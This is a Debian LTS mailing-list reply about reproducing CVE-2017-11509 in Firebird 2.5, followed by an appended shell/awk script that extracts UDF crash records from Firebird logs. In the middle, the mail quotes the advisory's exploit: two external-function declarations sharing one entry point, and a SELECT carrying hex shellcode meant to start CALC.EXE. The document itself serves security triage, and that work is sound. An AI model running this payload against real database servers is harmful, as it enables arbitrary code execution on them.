Re: Wheezy update of firebird2.5?
On 2018-04-04 19:54:14, Damyan Ivanov wrote:
> -=| Chris Lamb, 04.04.2018 08:39:52 +0100 |=-
>> Dear maintainer(s),
>>
>> The Debian LTS team would like to fix the security issues which are
>> currently open in the Wheezy version of firebird2.5:
>> https://security-tracker.debian.org/tracker/source-package/firebird2.5
>>
>> Would you like to take care of this yourself?
>
> Sorry, no.
>
> AFAIS, the only open vulnerability is CVE-2017-11509. Moritz from the
> security team advised against updating that for stable, and the issue
> is still open in unstable.
>
> According to the researchers discovering it, upstream refused to fix
> it :( so the only "fix" I am aware of is the change in the default
> config to disable the vulnerable functionality. You can find the patch
> for firebird3.0 at
> https://salsa.debian.org/firebird-team/firebird3.0/commit/5ad1c64f67ce9f091a2b747fa54519ef7d144698
>
> It is perhaps not directly applicable to firebird2.5, but should help
> regardless.

I tried digging into this issue a little further, and couldn't get
far. I always have this hurdle to just set up a test environment with
Firebird, so I figured I would share the procedure here for the future,
so that I wouldn't have to rebuild this from scratch every time.

 1. install the database and packages:

        apt-get install firebird2.5-examples firebird2.5-dev firebird2.5-superclassic

 2. set an admin password and configure the server:

        dpkg-reconfigure firebird2.5-superclassic

 3. deploy a test database:

        gunzip -c /usr/share/doc/firebird2.5-examples/examples/empbuild/employee.fdb.gz > /var/lib/firebird/2.5/data/employee.fdb
        chown firebird.firebird /var/lib/firebird/2.5/data/employee.fdb

 4. connect to the database, in an `isql-fb` prompt:

        SQL> connect "localhost:/var/lib/firebird/2.5/data/employee.fdb" user 'SYSDBA' password 'password';

Then you can do stuff like `SHOW TABLES` and so on. In particular, I
have tried to reproduce the issue and I can confirm I can create two
external functions with the same ENTRY_POINT, although the second
snippet in the advisory has two `DECLARE` statements which I assume is a
typo:

    DECLARE EXTERNAL FUNCTION string2blob
    VARCHAR(300) BY DESCRIPTOR,
    BLOB RETURNS PARAMETER 2
    ENTRY_POINT 'string2blob' MODULE_NAME 'fbudf'

    DECLARE EXTERNAL FUNCTION a6
    VARCHAR(300) BY DESCRIPTOR,
    VARCHAR(400) BY DESCRIPTOR
    RETURNS INTEGER
    ENTRY_POINT 'string2blob' MODULE_NAME 'fbudf'

The actual query to trigger arbitrary code execution seems to fail,
however:

    SQL> select a6((select x'31db648b7b308b7f0c8b7f1c8b47088b77208b3f807e0c3375f289c703783c8b577801c28b7a2001c789dd8b34af01c645813e4372656175f2817e086f63657375e98b7a2401c7668b2c6f8b7a1c01c78b7caffc01c789d9b1ff53e2fd6863616c6389e252525353535353535253ffd7' from rdb$database), (select x'11111111C8FD8503' from rdb$database)) from rdb$database
    Statement failed, SQLSTATE = 08006
    Unable to complete network request to host "localhost".
    -Error writing data to the connection.

Considering it was crafted to start `CALC.EXE` in Windows, that might be
expected. We do see a segfault in the logs however:

    wheezy Tue Apr 17 16:49:56 2018
    The user defined function: A6
    referencing entrypoint: string2blob
    in module: fbudf
    caused the fatal exception: Segmentation Fault.
    The code attempted to access memory
    without privilege to do so.
    This exception will cause the Firebird server
    to terminate abnormally.

... which is probably a bad sign.

I don't quite know where to go from here. I was somewhat hoping that
Wheezy would be magically not vulnerable to this issue, but obviously,
there's something wrong here that should probably be fixed.

A.

--
Every time I see an adult on a bicycle I no longer despair for the
future of the human race.
- H. G. Wells
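
Added example, not part of the original message and not Firebird or Debian project code: a shell/awk filter that extracts UDF crash records like the one quoted in the mail from a Firebird log, so that a crashing external function and the entry point it was bound to can be found after the fact. The function names `udf_crashes` and `sample_log` are hypothetical, the sample input is constructed from the record in the mail, and the indentation of real log records is an assumption the parser does not depend on.

```shell
#!/bin/sh
# Added example: list UDF crash reports found in a Firebird server log.
# Output, one line per crash: header|function|entrypoint|module|exception

udf_crashes() {
    awk '
    # Text after the first ":" on the line, with surrounding blanks removed.
    function val(s) {
        sub(/^[^:]*:[ \t]*/, "", s); sub(/[ \t\r]+$/, "", s)
        return s
    }
    # Record header: "<host> <weekday> <month> <day> <hh:mm:ss> <year>".
    /^[^ \t]+[ \t]+[A-Z][a-z][a-z] [A-Z][a-z][a-z] +[0-9]+ [0-9:]+ [0-9]+[ \t\r]*$/ {
        hdr = $0; gsub(/[ \t\r]+/, " ", hdr); sub(/ $/, "", hdr)
        fn = ""; ep = ""; mod = ""; next
    }
    /The user defined function:/  { fn  = val($0); next }
    /referencing entrypoint:/     { ep  = val($0); next }
    /in module:/                  { mod = val($0); next }
    /caused the fatal exception:/ && fn != "" {
        exc = val($0); sub(/\.$/, "", exc)
        print hdr "|" fn "|" ep "|" mod "|" exc
        fn = ""; ep = ""; mod = ""
    }
    ' "$@"
}

# Constructed sample: the crash record quoted in the mail, preceded by one
# unrelated record whose time and message are made up.
sample_log() {
    cat <<'EOF'

wheezy  Tue Apr 17 16:40:02 2018
        INET/inet_error: read errno = 104

wheezy  Tue Apr 17 16:49:56 2018
        The user defined function:      A6
           referencing entrypoint:      string2blob
                        in module:      fbudf
        caused the fatal exception: Segmentation Fault.
                The code attempted to access memory
                without privilege to do so.
        This exception will cause the Firebird server
        to terminate abnormally.
EOF
}

# With file arguments, scan them; otherwise run on the sample.
if [ $# -gt 0 ]; then udf_crashes "$@"; else sample_log | udf_crashes; fi
```

Each output line pairs the SQL-level function name with the library entry point it was declared against, which is the pairing the two `DECLARE` statements in the mail set up.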